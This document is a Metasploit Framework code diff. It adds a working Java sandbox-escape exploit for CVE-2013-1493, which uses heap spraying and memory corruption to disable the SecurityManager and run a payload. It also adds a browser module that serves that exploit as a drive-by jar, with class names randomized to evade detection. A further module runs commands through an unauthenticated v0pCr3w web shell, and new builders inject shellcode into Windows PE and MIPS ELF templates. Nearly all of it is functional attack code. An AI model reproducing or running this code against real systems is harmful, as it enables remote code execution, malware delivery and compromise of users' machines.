diff --git a/data/exploits/cve-2013-1493/Init.class b/data/exploits/cve-2013-1493/Init.class new file mode 100644 index 0000000000..9ee6d144b0 Binary files /dev/null and b/data/exploits/cve-2013-1493/Init.class differ diff --git a/data/exploits/cve-2013-1493/Leak.class b/data/exploits/cve-2013-1493/Leak.class new file mode 100644 index 0000000000..dbe8281a26 Binary files /dev/null and b/data/exploits/cve-2013-1493/Leak.class differ diff --git a/data/exploits/cve-2013-1493/MyBufferedImage.class b/data/exploits/cve-2013-1493/MyBufferedImage.class new file mode 100644 index 0000000000..66db13bc91 Binary files /dev/null and b/data/exploits/cve-2013-1493/MyBufferedImage.class differ diff --git a/data/exploits/cve-2013-1493/MyColorSpace.class b/data/exploits/cve-2013-1493/MyColorSpace.class new file mode 100644 index 0000000000..8223c35fae Binary files /dev/null and b/data/exploits/cve-2013-1493/MyColorSpace.class differ diff --git a/data/templates/template_mipsbe_linux.bin b/data/templates/template_mipsbe_linux.bin new file mode 100755 index 0000000000..9912a7571b Binary files /dev/null and b/data/templates/template_mipsbe_linux.bin differ diff --git a/external/source/exploits/cve-2013-1493/Init.java b/external/source/exploits/cve-2013-1493/Init.java new file mode 100755 index 0000000000..655c470361 --- /dev/null +++ b/external/source/exploits/cve-2013-1493/Init.java @@ -0,0 +1,232 @@ +import java.applet.Applet; +import java.awt.color.ColorSpace; +import java.awt.image.BufferedImage; +import java.awt.image.ColorConvertOp; +import java.awt.image.ColorModel; +import java.awt.image.ComponentColorModel; +import java.awt.image.ComponentSampleModel; +import java.awt.image.SampleModel; +import metasploit.Payload; + +public class Init extends Applet { + + private static final long serialVersionUID = 1L; + static final int ARRAY_MAGIC = -1341411317; + static final int ARRAY_OLDSIZE = 11; + static final int ARRAY_NEWSIZE = 2147483647; + static final int LEAK_MAGIC = -559035650; + static final int SPRAY_ARRAY_COUNT = 2808685; + static final int SPRAY_LEAK_COUNT = 2000000; + volatile Leak[] _sleaks; + volatile int[][] _sarrays; + volatile int[] _bigArray; + int[] _memBaseObj; + long _memBaseIdx; + long _memBasePtr; + int[] soffsets; + int[] doffsets; + + + public Init() + { + this.soffsets = new int[] { 0, 1, 2, 3 }; + this.doffsets = new int[] { 0, 1, 2, 50000000 }; + } + + void spray() throws Exception + { + Runtime.getRuntime().gc(); + Runtime.getRuntime().gc(); + + this._sleaks = new Leak[2000000]; + this._sarrays = new int[2808685][]; + try + { + for (int i = 0; i < this._sarrays.length; i++) { + this._sarrays[i] = new int[11]; + for (int j = 0; j < this._sarrays[i].length; j++) { + this._sarrays[i][j] = -1341411317; + } + } + + for (int i = 0; i < this._sleaks.length; i++) + this._sleaks[i] = new Leak("L"); + } + catch (OutOfMemoryError localOutOfMemoryError) + { + } + } + + void getBigArray() throws Exception + { + for (int i = 0; i < this._sarrays.length; i++) { + for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) { + this._sarrays[i][j] = -1341411317; + } + } + + for (int i = 0; i < this._sarrays.length; i++) { + if (this._sarrays[i].length != 2147483647) { + for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) { + if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) { + this._sarrays[i][(j - 1)] = 2147483647; + } + } + } + } + + for (int i = 0; i < this._sarrays.length; i++) { + if ((this._sarrays[i].length == 11) || (this._bigArray != null) || (this._sarrays[i].length != 2147483647)) + continue; + this._bigArray = this._sarrays[i]; + } + + if (this._bigArray == null) + throw new Exception("fail"); + } + + long getAddress(Object obj) throws Exception + { + for (int i = 0; i < this._bigArray.length; i++) { + if (this._bigArray[i] == -559035650) { + int flag = 0; + + for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = null; + flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0); + + for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = "X"; + flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0); + + if (flag == 2) { + for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = obj; + return this._bigArray[(i + 1)]; + } + } + } + + throw new Exception("fail"); + } + + void getMemBase() throws Exception + { + for (int i = 0; i < this._sarrays.length; i++) { + for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) { + this._sarrays[i][j] = (j == 1 ? i : -1341411317); + } + } + + for (int i = 0; i < this._bigArray.length; i++) { + if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) { + int len = this._bigArray[(i - 1)]; + int idx = this._bigArray[(i + 1)]; + if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) { + this._memBaseObj = this._sarrays[idx]; + this._memBaseIdx = i; + break; + } + } + } + + if (this._memBaseObj == null) { + throw new Exception("fail"); + } + + this._memBasePtr = getAddress(this._memBaseObj); + + if (this._memBasePtr == 0L) { + throw new Exception("fail"); + } + + this._memBasePtr += 12L; + } + + int rdMem(long addr) + { + long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L; + if ((offs >= 0L) && (offs < 2147483647L)) { + return this._bigArray[(int)offs]; + } + return 0; + } + + void wrMem(long addr, int value) + { + long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L; + if ((offs >= 0L) && (offs < 2147483647L)) + this._bigArray[(int)offs] = value; + } + + void privileged() + { + try + { + Payload.main(null); + } catch (Exception localException) { + //localException.printStackTrace(); + } + } + + + public void init() + { + try + { + if (System.getSecurityManager() == null) { + privileged(); + return; + } + + int sWidth = 168; int sHeight = 1; + int spStride = 4; int ssStride = spStride * sWidth; + + int dWidth = sWidth; int dHeight = sHeight; + int dpStride = 1; int dsStride = 0; + + ColorSpace scs = new MyColorSpace(0, this.soffsets.length - 1); + ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0); + SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets); + BufferedImage sbi = new MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm); + + for (int i = 0; i < ssStride; i++) { + sbi.getRaster().getDataBuffer().setElem(i, 1); + } + + ColorSpace dcs = new MyColorSpace(0, this.doffsets.length - 1); + ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0); + SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets); + BufferedImage dbi = new MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm); + + ColorConvertOp cco = new ColorConvertOp(null); + + spray(); + try + { + cco.filter(sbi, dbi); + } + catch (Exception localException) { } + getBigArray(); + + getMemBase(); + + long sys = getAddress(System.class); + long sm = getAddress(System.getSecurityManager()); + sys = rdMem(sys + 4L); + for (int i = 0; i < 2000000; i++) { + long addr = sys + i * 4; + int val = rdMem(addr); + if (val == sm) { + wrMem(addr, 0); + if (System.getSecurityManager() == null) { + break; + } + } + } + privileged(); + } + catch (Exception localException1) + { + } + } + + +} diff --git a/external/source/exploits/cve-2013-1493/Leak.java b/external/source/exploits/cve-2013-1493/Leak.java new file mode 100755 index 0000000000..ef273ff7cb --- /dev/null +++ b/external/source/exploits/cve-2013-1493/Leak.java @@ -0,0 +1,14 @@ +class Leak +{ + public volatile int magic; + public volatile Object obj; + public volatile Object obj2; + public volatile Object obj3; + public volatile Object obj4; + + public Leak(Object o) + { + this.magic = -559035650; + this.obj = o; + } +} diff --git a/external/source/exploits/cve-2013-1493/Makefile b/external/source/exploits/cve-2013-1493/Makefile new file mode 100644 index 0000000000..1767215507 --- /dev/null +++ b/external/source/exploits/cve-2013-1493/Makefile @@ -0,0 +1,20 @@ +CLASSES = \ + Init.java \ + Leak.java \ + MyBufferedImage.java \ + MyColorSpace.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.5 -target 1.5 -cp "../../../../data/java:." $*.java + +all: $(CLASSES:.java=.class) + +install: + mv Init.class ../../../../data/exploits/cve-2013-1493/ + mv Leak.class ../../../../data/exploits/cve-2013-1493/ + mv MyBufferedImage.class ../../../../data/exploits/cve-2013-1493/ + mv MyColorSpace.class ../../../../data/exploits/cve-2013-1493/ + +clean: + rm -rf *.class diff --git a/external/source/exploits/cve-2013-1493/MyBufferedImage.java b/external/source/exploits/cve-2013-1493/MyBufferedImage.java new file mode 100755 index 0000000000..ad0ca1647a --- /dev/null +++ b/external/source/exploits/cve-2013-1493/MyBufferedImage.java @@ -0,0 +1,49 @@ +import java.awt.image.BufferedImage; +import java.awt.image.ColorModel; +import java.awt.image.SampleModel; + +class MyBufferedImage extends BufferedImage +{ + int _fakeType; + ColorModel _fakeColorModel; + SampleModel _fakeSampleModel; + + public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel) + { + super(width,height, imageType); + + this._fakeType = fakeType; + this._fakeColorModel = fakeColorModel; + this._fakeSampleModel = fakeSampleModel; + } + + public int getType() + { + String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString(); + if (caller.contains("ICC_Transform.getImageLayout(")) { + return this._fakeType; + } + + return super.getType(); + } + + public ColorModel getColorModel() + { + String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString(); + if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.("))) { + return this._fakeColorModel; + } + + return super.getColorModel(); + } + + public SampleModel getSampleModel() + { + String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString(); + if (caller.contains("ICC_Transform.getImageLayout(")) { + return this._fakeSampleModel; + } + + return super.getSampleModel(); + } +} diff --git a/external/source/exploits/cve-2013-1493/MyColorSpace.java b/external/source/exploits/cve-2013-1493/MyColorSpace.java new file mode 100755 index 0000000000..9d371912bf --- /dev/null +++ b/external/source/exploits/cve-2013-1493/MyColorSpace.java @@ -0,0 +1,15 @@ +import java.awt.color.ColorSpace; + +class MyColorSpace extends ColorSpace +{ + private static final long serialVersionUID = 1L; + + public MyColorSpace(int type, int numcomponents) + { + super(type,numcomponents); + } + public float[] fromCIEXYZ(float[] value) { return null; } + public float[] toCIEXYZ(float[] value) { return null; } + public float[] fromRGB(float[] value) { return null; } + public float[] toRGB(float[] value) { return null; } +} diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 0c5eca0ca9..f0be6679c3 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -313,8 +313,8 @@ class Auxiliary::Web::HTTP # This is bad but we can't anticipate the gazilion different types of network # i/o errors between Rex and Errno. rescue => e - print_error e.to_s - e.backtrace.each { |l| print_error l } + elog e.to_s + e.backtrace.each { |l| elog l } Response.empty end diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index e187bb415c..937c155af0 100755 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -127,6 +127,13 @@ require 'digest/sha1' end # XXX: Add remaining MIPSLE systems here end + + if(arch.index(ARCH_MIPSBE)) + if(plat.index(Msf::Module::Platform::Linux)) + return to_linux_mipsbe_elf(framework, code) + end + # XXX: Add remaining MIPSLE systems here + end nil end @@ -357,6 +364,41 @@ require 'digest/sha1' exe end + def self.to_win32pe_only(framework, code, opts={}) + + # Allow the user to specify their own EXE template + set_template_default(opts, "template_x86_windows_old.exe") + + pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) + + exe = '' + File.open(opts[:template], 'rb') { |fd| + exe = fd.read(fd.stat.size) + } + + sections_header = [] + pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] } + + + #look for section with entry point + sections_header.each do |sec| + virtualAddress = sec[1][0xc,0x4].unpack('L')[0] + sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0] + characteristics = sec[1][0x24,0x4].unpack('L')[0] + if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData + #put this section writable + characteristics|=0x80000000 + newcharacteristics = [characteristics].pack('L') + exe[sec[0],newcharacteristics.length]=newcharacteristics + end + end + + #put the shellcode at the entry point, overwriting template + exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code + + return exe + end + def self.to_win32pe_old(framework, code, opts={}) @@ -615,7 +657,7 @@ require 'digest/sha1' # segments as writable and overwrites the entrypoint (usually _start) with # the payload. # - def self.to_exe_elf(framework, opts, template, code) + def self.to_exe_elf(framework, opts, template, code, big_endian=false) # Allow the user to specify their own template set_template_default(opts, template) @@ -640,11 +682,21 @@ require 'digest/sha1' # Use the proper offsets and pack size case elf[4] when 1, "\x01" # ELFCLASS32 - 32 bit (ruby 1.8 and 1.9) - elf[0x44,4] = [elf.length].pack('V') #p_filesz - elf[0x48,4] = [elf.length + code.length].pack('V') #p_memsz + if big_endian + elf[0x44,4] = [elf.length].pack('N') #p_filesz + elf[0x48,4] = [elf.length + code.length].pack('N') #p_memsz + else # little endian + elf[0x44,4] = [elf.length].pack('V') #p_filesz + elf[0x48,4] = [elf.length + code.length].pack('V') #p_memsz + end when 2, "\x02" # ELFCLASS64 - 64 bit (ruby 1.8 and 1.9) - elf[0x60,8] = [elf.length].pack('Q') #p_filesz - elf[0x68,8] = [elf.length + code.length].pack('Q') #p_memsz + if big_endian + elf[0x60,8] = [elf.length].pack('Q>') #p_filesz + elf[0x68,8] = [elf.length + code.length].pack('Q>') #p_memsz + else # little endian + elf[0x60,8] = [elf.length].pack('Q') #p_filesz + elf[0x68,8] = [elf.length + code.length].pack('Q') #p_memsz + end else raise RuntimeError, "Invalid ELF template: EI_CLASS value not supported" end @@ -722,6 +774,11 @@ require 'digest/sha1' return elf end + def self.to_linux_mipsbe_elf(framework, code, opts={}) + elf = to_exe_elf(framework, opts, "template_mipsbe_linux.bin", code, true) + return elf + end + def self.to_exe_vba(exes='') exe = exes.unpack('C*') vba = "" @@ -1908,6 +1965,11 @@ End Sub output = Msf::Util::EXE.to_win32pe_old(framework, code, exeopts) end + when 'exe-only' + if(not arch or (arch.index(ARCH_X86))) + output = Msf::Util::EXE.to_win32pe_only(framework, code, exeopts) + end + when 'elf' if (not plat or (plat.index(Msf::Module::Platform::Linux))) if (not arch or (arch.index(ARCH_X86))) @@ -1972,7 +2034,7 @@ End Sub end def self.to_executable_fmt_formats - ['dll','exe','exe-small','elf','macho','vba','vba-exe','vbs','loop-vbs','asp','aspx','war','psh','psh-net'] + ['dll','exe','exe-small','exe-only','elf','macho','vba','vba-exe','vbs','loop-vbs','asp','aspx','war','psh','psh-net'] end # diff --git a/modules/exploits/multi/http/v0pcr3w_exec.rb b/modules/exploits/multi/http/v0pcr3w_exec.rb new file mode 100644 index 0000000000..c480d5e0b3 --- /dev/null +++ b/modules/exploits/multi/http/v0pcr3w_exec.rb @@ -0,0 +1,91 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'v0pCr3w Web Shell Remote Code Execution', + 'Description' => %q{ + This module exploits a lack of authentication in the shell developed by v0pCr3w + and is widely reused in automated RFI payloads. This module takes advantage of the + shell's various methods to execute commands. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'bwall ', # vuln discovery & msf module + ], + 'References' => + [ + ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell'], + ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0'] + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 2000, + 'BadChars' => '', + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'Platform' => ['unix', 'win'], + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['v0pCr3w / Unix', { 'Platform' => 'unix' } ], + ['v0pCr3w / Windows', { 'Platform' => 'win' } ] + ], + 'DisclosureDate' => 'Mar 23 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, "The path to the v0pCr3w shell", "/jos.php"]), + ],self.class) + end + + def check + shell = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path.to_s), + 'vars_get' => { + 'lol' => '1' + } + }) + if (shell and shell.body =~ /v0pCr3w\/ and shell.body =~ /\nob0dyCr3w/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def http_send_command(cmd) + p = Rex::Text.encode_base64(cmd) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path.to_s), + 'vars_get' => { + 'osc' => p + } + }) + if not (res and res.code == 200) + fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') + end + end + + def exploit + http_send_command(payload.encoded) + end +end diff --git a/modules/exploits/windows/browser/java_cmm.rb b/modules/exploits/windows/browser/java_cmm.rb new file mode 100644 index 0000000000..af26c2634f --- /dev/null +++ b/modules/exploits/windows/browser/java_cmm.rb @@ -0,0 +1,128 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ :javascript => false }) + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java CMM Remote Code Execution', + 'Description' => %q{ + This module abuses the Color Management classes from a Java Applet to run + arbitrary Java code outside of the sandbox as exploited in the wild in February + and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 + and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 + systems. This exploit doesn't bypass click-to-play, so the user must accept the java + warning in order to run the malicious applet. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and Exploit + 'juan vazquez' # Metasploit module (just ported the published exploit) + ], + 'References' => + [ + [ 'CVE', '2013-1493' ], + [ 'OSVDB', '90737' ], + [ 'BID', '58238' ], + [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ], + [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ], + [ 'URL', 'http://pastie.org/pastes/6581034' ] + ], + 'Platform' => [ 'win', 'java' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => 'java', + 'Arch' => ARCH_JAVA + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86 + } + ] + ], + 'DefaultTarget' => 1, + 'DisclosureDate' => 'Mar 01 2013' + )) + end + + + def setup + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class") + @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class") + @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class") + @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class") + @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + @init_class_name = rand_text_alpha("Init".length) + @init_class.gsub!("Init", @init_class_name) + super + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + + case request.uri + when /\.jar$/i + jar = payload.encoded_jar + jar.add_file("#{@init_class_name}.class", @init_class) + jar.add_file("Leak.class", @leak_class) + jar.add_file("MyBufferedImage.class", @buffered_image_class) + jar.add_file("MyColorSpace.class", @color_space_class) + metasploit_str = rand_text_alpha("metasploit".length) + payload_str = rand_text_alpha("payload".length) + jar.entries.each { |entry| + entry.name.gsub!("metasploit", metasploit_str) + entry.name.gsub!("Payload", payload_str) + entry.data = entry.data.gsub("metasploit", metasploit_str) + entry.data = entry.data.gsub("Payload", payload_str) + } + jar.build_manifest + + send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) + when /\/$/ + payload = regenerate_payload(cli) + if not payload + print_error("Failed to generate the payload.") + send_not_found(cli) + return + end + send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) + else + send_redirect(cli, get_resource() + '/', '') + end + + end + + def generate_html + html = %Q|Loading, Please Wait...| + html += %Q|

Loading, Please Wait...

| + html += %Q|| + html += %Q|| + return html + end + +end